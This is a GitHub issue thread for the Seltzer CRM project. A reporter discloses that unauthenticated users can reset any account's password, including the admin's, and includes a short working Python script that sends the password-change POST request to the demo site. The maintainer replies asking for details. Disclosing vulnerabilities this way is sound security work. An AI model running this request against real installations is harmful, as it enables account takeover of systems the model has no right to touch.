Closed altinukshini closed 6 years ago
Hi! Thanks for finding this! Can you give any more information on how this works? Is there a missing permissions check or is this somehow injecting data into the php $_SESSION variable?
Also, which hackerspace are you from?
On Tue, Feb 27, 2018 at 9:10 PM, Altin Ukshini notifications@github.com wrote:
cid is still not handled well from this issue (#241 https://github.com/elplatt/seltzer/issues/241). An authenticated user visiting a URL with a string cid param can show a lot of unwanted data: http://demo.seltzercrm.org/?q=contact&cid=j or http://demo.seltzercrm.org/?q=contact&cid="2"
I'd like to credit a young kid at our hackerspace for figuring this out and breaking our CRM :D. Unauthorized/unauthenticated users can change the admin's (or anyone's) password by making a POST request to http://demo.seltzercrm.org/?q=contact&cid=1 with data: {'cid': 1, 'command': 'set_password', 'password': 'lol123', 'confirm': 'lol123', 'submitted':'Change+password'}
You can try this simple Python script:
import requests

# Browser-like headers; the Accept value is restored to "*/*" here, which the
# issue renderer apparently stripped from the original post.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0',
    'Accept': 'application/json, text/javascript, */*; q=0.01',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest',
}
session = requests.Session()
# No login is performed before this request; that is the point of the report.
content = session.post("http://demo.seltzercrm.org/index.php?q=contact&cid=1",
                       data={'cid': 1, 'command': 'set_password',
                             'password': 'helloworld', 'confirm': 'helloworld',
                             'submitted': 'Change+password'},
                       headers=headers)
print(content)
— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/elplatt/seltzer/issues/409, or mute the thread https://github.com/notifications/unsubscribe-auth/AAS0WEQaPhaay9QpXUmIowNy8yVKA-LSks5tZLWOgaJpZM4SV9NE .
-- Edward L. Platt https://elplatt.com | @elplatt | elplatt@social.coop